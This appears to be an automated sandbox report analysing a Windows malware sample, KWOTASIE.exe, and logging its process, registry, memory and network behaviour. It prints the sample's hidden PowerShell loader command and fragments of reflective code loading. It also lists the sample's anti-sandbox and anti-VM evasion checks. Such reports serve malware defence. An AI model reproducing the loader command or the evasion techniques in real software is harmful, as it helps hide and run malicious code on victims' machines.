Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: KWOTASIE.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbagebetalingen $underdegreed $Knaggy), (Implicated @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:dragsterne = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Valters)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Madrasah, $false).DefineType($Bonne, $Vingesuset,

Suspicious powershell command line found

Source: C:\Users\user\Desktop\KWOTASIE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
Source: C:\Users\user\Desktop\KWOTASIE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"			Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 61D9EB7

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 21AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23AF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6309	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3476	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 8483	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1375	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3572	Thread sleep count: 8483 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3572	Thread sleep count: 1375 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -98016s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97900s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96890s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -96000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3092	Thread sleep time: -95344s >= -30000s	Jump to behavior
